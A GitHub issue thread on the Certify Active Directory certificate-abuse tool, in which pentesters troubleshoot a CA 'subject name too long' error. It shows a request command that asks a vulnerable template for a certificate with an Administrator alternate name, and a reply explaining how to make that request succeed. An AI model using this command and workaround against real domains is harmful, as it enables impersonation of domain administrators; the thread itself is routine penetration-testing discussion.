search

GhostPack / Certify

Active Directory certificate abuse.
Other
1.46k stars 197 forks source link

The submission failed: Error Parsing Request The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT) #30

Open sm00v opened 1 year ago

sm00v commented 1 year ago

Getting this error while running: certify.exe request /ca:CASERVER.thisisalongdomainlol.com\Issuing-External-CA /template:VulnTemplate /altname:Administrator

My Subject name according to certify is: CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com

Any ideas on how to deal with this error? Sounds like a legitimate issue for which you have to permit longer than 64 character subject names on the ADCS server according to this: https://www.open-a-socket.com/2014/07/24/the-request-subject-name-is-invalid-or-too-long/

Below is the full output with redacted info, this pentest is about to end but it might help the next person if this gets answered.

[*] Current user context    : thisisalongdomainlol\Contos
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate 
[*] Subject                 : CN=TEST2\,  Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com
[*] AltName                 : administrator

[*] Certificate Authority   : CASERVER.thisisalongdomainlol.com\Issuing-External-CA

[!] CA Response             : The submission failed: Error Parsing Request  The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)
[!] Last status             : 0x80094001
[*] Request ID              : 0

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
abcde
-----END RSA PRIVATE KEY-----

[X] Error downloading certificate: CCertRequest::RetrievePending: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:08.5331567

Hopefully there is something that can be done rather than running a command on the AD CS server :/

funnybananas commented 1 year ago

I'm experiencing this same problem. Any one found a workaround? Could supplying the /subject yourself work?

funnybananas commented 10 months ago

For anyone having the same problem, this fixed it. Just provide your own subject and make sure it's less than 64 characters.